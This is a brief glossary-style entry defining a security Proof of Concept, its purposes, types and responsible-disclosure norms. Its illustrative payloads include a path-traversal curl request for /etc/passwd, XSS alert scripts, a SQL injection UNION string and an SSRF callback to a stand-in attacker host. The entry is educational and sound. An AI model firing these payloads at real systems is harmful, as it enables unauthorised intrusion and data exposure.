Proof of Concept (PoC)

Proof of Concept (PoC) is code or a demonstration that proves a vulnerability exists and is exploitable. PoCs validate security issues without necessarily providing a full weaponized exploit.

Purpose of PoCs

• Verify a vulnerability exists
• Demonstrate impact to stakeholders
• Enable reproduction for fixing
• Support CVE and advisory documentation

PoC vs Full Exploit

# PoC: Demonstrates the vulnerability
# Shows arbitrary file read is possible
curl "http://target/download?file=../../../etc/passwd"
# Returns /etc/passwd contents

# Full exploit: Chains for maximum impact
# Reads credentials, establishes persistence, etc.

PoC Types

Non-Destructive

# XSS PoC using alert
<script>alert('XSS')</script>
<script>alert(document.domain)</script>

# SQLi PoC showing data extraction
?id=1' UNION SELECT version(),user()--

Out-of-Band Verification

# Blind vulnerabilities verified via callbacks
# SSRF: ?url=http://attacker-server.com/ssrf-confirmed
# XXE with external DTD fetching

Responsible Disclosure

PoCs should demonstrate impact while minimizing harm potential. Avoid publishing full exploits for critical vulnerabilities before patches are available.

Components of a Good PoC

• Clear description of the vulnerability
• Affected versions/configurations
• Step-by-step reproduction instructions
• Expected vs actual behavior
• Remediation guidance

See Also

• Exploit Payload
• CVE
• Exploit Chain